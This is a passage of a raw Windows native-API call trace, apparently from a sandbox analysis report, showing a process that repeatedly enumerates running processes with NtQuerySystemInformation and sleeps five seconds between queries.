BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.784] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.885] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.895] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.932] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.941] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0263.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0263.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0263.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0263.971] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0263.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0263.975] NtQuerySystemInformation (in: 